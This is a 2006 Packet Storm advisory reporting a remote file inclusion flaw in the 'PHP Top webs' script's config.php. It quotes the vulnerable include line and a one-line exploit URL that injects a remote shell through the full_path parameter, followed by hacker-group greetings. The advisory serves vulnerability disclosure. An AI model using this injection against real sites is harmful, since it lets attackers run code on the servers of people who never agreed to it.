phptopwebs-rfi.txt

2006-10-18T00:00:00
ID PACKETSTORM:51079
Type packetstorm
Reporter Le CoPrA
Modified 2006-10-18T00:00:00

Description

                                        
                                            `=====================================================================  
  
# PHP Top webs (config.php) Remote File Inclue Vulnerability  
  
=====================================================================  
  
# Author : Le CoPrA  
  
=====================================================================  
  
# Download Script : http://www.linkini.net/phpscripts/descargas/Top%20Sites%20(8%20Archivos)/PHP%20Top%20webs.zip  
  
=====================================================================  
  
# Bug in : config.php  
  
# Vuln Code :  
  
include_once("$full_path/functions.php");  
  
=====================================================================  
  
# Exploit :  
  
http://www.victim.com/[path]/config.php?full_path=|SHELL|?  
  
=====================================================================  
  
# Discovered by : Le CoPrA  
  
# ConTaCT : Le.CoPrA |at| Hotmail |dot| CoM  
  
# Special Greetz FlyinG 2 || Str0ke ||  
  
# Greetz4// alkasrgolden,LovER BoY, Saudi Hackrz, HACKERS PAL,kOnDoR, Black-Code, CrAsH_oVeR_rIdE, bOhAjEr, Broken-Proxy, simo64  
3theaby geer, Mohajer22, Qaher_Yhod, MR.WOLF, cRiMiNaL NeT, al3iznet,Abdullah-00 , egyptghost, ToOoFA,HaKrAwY  
  
# Channel : wWw.TrYaG.cOm/vb || WwW.kOnDoR4.Com/vb || wWw.Q8cracker.com  
  
===========================================================================================================================  
  
  
`